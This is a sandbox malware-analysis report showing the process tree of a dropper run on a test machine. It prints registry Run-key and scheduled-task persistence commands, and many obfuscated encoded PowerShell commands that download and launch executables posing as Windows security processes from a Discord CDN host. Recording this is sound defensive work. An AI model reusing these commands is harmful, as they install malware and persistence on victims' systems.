popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

      • WINDOWSHELLHOSTT.EXE "C:\Users\test22\AppData\Roaming\WINDOWSHELLHOSTT.EXE"

        2816

        • powershell.exe "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WIndowShellHost';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WIndowShellHost' -Value '"C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe"' -PropertyType 'String'

          2884

        • cmd.exe "cmd" /C schtasks /create /tn \WIndowShellHost /tr "C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

          2932

          • DEFENDERRUNTIME.EXE "C:\Users\test22\AppData\Roaming\DEFENDERRUNTIME.EXE"

            1384

            • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAdQBuACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANQA4ADkAOAA4ADcAMgA2ADgAOAA2ADgAMAAvAEQAZQBmAGUAbgBkAGUAcgBSAHUAbgB0AGkAbQBlAC4AZQB4AGUAJwAsACAAPAAjAGUAcgBlACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZgBhAGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZwB4AGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcARABlAGYAZQBuAGQAZQByAFIAdQBuAHQAaQBtAGUALgBlAHgAZQAnACkAKQA8ACMAbQBqAGsAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeAB0AGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGMAagBjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEQAZQBmAGUAbgBkAGUAcgBSAHUAbgB0AGkAbQBlAC4AZQB4AGUAJwApADwAIwB0AGcAeAAjAD4A"

              3080

          • DEFENDERRUNTIMEE.EXE "C:\Users\test22\AppData\Roaming\DEFENDERRUNTIMEE.EXE"

            2100

            • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAeQB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANQA3ADkAMwA3ADkAMgA4ADAAMgA5ADMANgAvAEQAZQBmAGUAbgBkAGUAcgBSAHUAbgB0AGkAbQBlAGUALgBlAHgAZQAnACwAIAA8ACMAaABhAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBrAGIAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBiAHAAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBEAGUAZgBlAG4AZABlAHIAUgB1AG4AdABpAG0AZQBlAC4AZQB4AGUAJwApACkAPAAjAGcAcwB0ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAcAB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAHYAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBEAGUAZgBlAG4AZABlAHIAUgB1AG4AdABpAG0AZQBlAC4AZQB4AGUAJwApADwAIwBwAG4AeAAjAD4A"

              176

          • FILEMANAGE.EXE "C:\Users\test22\AppData\Roaming\FILEMANAGE.EXE"

            196

            • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAagB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAAyADcAMQA5ADUAMgA5ADIAOAA4ADMAMwA3ADAAMAAzADQALwAxADAAMwAwADgAOAA3ADEAOAA5ADYAMAAyADYANQAyADIAMgAxAC8ARgBpAGwAZQBNAGEAbgBhAGcAZQAuAGUAeABlACcALAAgADwAIwBpAG4AcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAYwBwACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAcABnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYAaQBsAGUATQBhAG4AYQBnAGUALgBlAHgAZQAnACkAKQA8ACMAdwB6AG0AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBkAGMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHUAeQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYAaQBsAGUATQBhAG4AYQBnAGUALgBlAHgAZQAnACkAPAAjAGsAdwBqACMAPgA="

              2400

          • FILEMANAGER.EXE "C:\Users\test22\AppData\Roaming\FILEMANAGER.EXE"

            2196

            • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcgBzACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA4ADkANQAyADAAMAAyADUAMQA5ADkANgAvAEYAaQBsAGUATQBhAG4AYQBnAGUAcgAuAGUAeABlACcALAAgADwAIwB0AG0AdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AcgBnACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHYAagBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYAaQBsAGUATQBhAG4AYQBnAGUAcgAuAGUAeABlACcAKQApADwAIwBmAHIAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAHIAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZQBzAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcARgBpAGwAZQBNAGEAbgBhAGcAZQByAC4AZQB4AGUAJwApADwAIwBnAHYAbAAjAD4A"

              3100

          • REDLINESECURITY.EXE "C:\Users\test22\AppData\Roaming\REDLINESECURITY.EXE"

            2260

            • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYQBxACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA2ADYANgA2ADUANgA4ADEAMwAxADgANgAvAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAGkAdAB5AC4AZQB4AGUAJwAsACAAPAAjAHcAagBwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZQBoAGsAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBzAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUgBlAGQAbABpAG4ARQBTAGUAYwB1AHIAaQB0AHkALgBlAHgAZQAnACkAKQA8ACMAdAB1AHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABnAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAcwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAGkAdAB5AC4AZQB4AGUAJwApADwAIwB1AGIAYwAjAD4A"

              1168

          • REDLINESECURTY.EXE "C:\Users\test22\AppData\Roaming\REDLINESECURTY.EXE"

            2456

            • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAaQB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA2ADEAMwA4ADEANgA5ADgAMwA2ADQAMgAvAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAHQAeQAuAGUAeABlACcALAAgADwAIwByAGwAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHUAbQBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAdgB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAHQAeQAuAGUAeABlACcAKQApADwAIwBjAGsAbAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGQAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZABzAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUgBlAGQAbABpAG4ARQBTAGUAYwB1AHIAdAB5AC4AZQB4AGUAJwApADwAIwBmAHUAcgAjAD4A"

              3196

          • S500UBNAN.EXE "C:\Users\test22\AppData\Roaming\S500UBNAN.EXE"

            2584

            • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAawBmACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA3ADkAOAA1ADcAMQA4ADYANAAxADMANAAvAHUAYgBuAGEAbgAuAGUAeABlACcALAAgADwAIwBzAGgAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAZgBnACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGUAegBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMANQAwADAAdQBiAG4AYQBuAC4AZQB4AGUAJwApACkAPAAjAHkAbgBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHIAdABmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB4AGwAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTADUAMAAwAHUAYgBuAGEAbgAuAGUAeABlACcAKQA8ACMAcwBoAHcAIwA+AA=="

              1376

          • SECURITYHEALTHSERVICE.EXE "C:\Users\test22\AppData\Roaming\SECURITYHEALTHSERVICE.EXE"

            2764

            • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZwBjACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgAxADUANgAwADIAOQA2ADYAMQAyADgANAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAdQByAHYAaQBjAGUALgBlAHgAZQAnACwAIAA8ACMAdABjAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB3AHMAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBmAHMAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAKQApADwAIwBnAHAAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBlAHIAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeAB5AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnACkAPAAjAHkAcgBsACMAPgA="

              1948

          • SECURITYHEALTHSEURVIC.EXE "C:\Users\test22\AppData\Roaming\SECURITYHEALTHSEURVIC.EXE"

            2692

            • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAbABiACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgAxADkAMgAxADUAOQA0ADAAOAAxADcAMAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAdQByAHYAaQBjAC4AZQB4AGUAJwAsACAAPAAjAGMAdwBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaAB4AGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBlAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAC4AZQB4AGUAJwApACkAPAAjAHoAaQBzACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAG0AaQBwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBlAGoAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMALgBlAHgAZQAnACkAPAAjAHkAeABsACMAPgA="

              3116

          • SECURITYHOST.EXE "C:\Users\test22\AppData\Roaming\SECURITYHOST.EXE"

            2900

            • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwBlACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAAyADcAMQA5ADUAMgA5ADIAOAA4ADMAMwA3ADAAMAAzADQALwAxADAAMwAwADgAOAA3ADMANQA5ADkANAAxADcAMgAyADEANgAyAC8AUwBlAGMAdQByAGkAdAB5AEgAbwBzAHQALgBlAHgAZQAnACwAIAA8ACMAZABnAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBqAHAAYwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGYAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwB1AHIAaQB0AHkASABvAHMAdAAuAGUAeABlACcAKQApADwAIwB2AGgAdAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAGQAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcABwAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBlAGMAdQByAGkAdAB5AEgAbwBzAHQALgBlAHgAZQAnACkAPAAjAHUAYgBoACMAPgA="

              1632

          • WINDOWSDEFENDERSMART.EXE "C:\Users\test22\AppData\Roaming\WINDOWSDEFENDERSMART.EXE"

            2964

            • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAYgB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA0ADIAOQAyADUANQAwADEAMgA0ADUAMgAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAAuAGUAeABlACcALAAgADwAIwBiAGIAegAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGoAbgBqACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAaQBjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAAuAGUAeABlACcAKQApADwAIwBlAGsAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHAAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbABwAGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIAUwBtAGEAcgB0AC4AZQB4AGUAJwApADwAIwBwAGoAdgAjAD4A"

              2072

          • WINDOWSPROTECT.EXE "C:\Users\test22\AppData\Roaming\WINDOWSPROTECT.EXE"

            3032

            • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYgB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADEAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAAyADcAMQA5ADUAMgA5ADIAOAA4ADMAMwA3ADAAMAAzADQALwAxADAAMwAwADgAOAA3ADQAOAAwADYANAA1ADMAOAA2ADMANgAxAC8AVwBpAG4AZABvAHcAcwBQAHIAbwB0AGUAYwB0AC4AZQB4AGUAJwAsACAAPAAjAGcAawBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdQBiAHYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBzAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAG4AZABvAHcAcwBQAHIAbwB0AGUAYwB0AC4AZQB4AGUAJwApACkAPAAjAGIAYwBzACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHEAdQBrACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB5AGsAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkAbgBkAG8AdwBzAFAAcgBvAHQAZQBjAHQALgBlAHgAZQAnACkAPAAjAGwAbgBlACMAPgA="

              2780

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf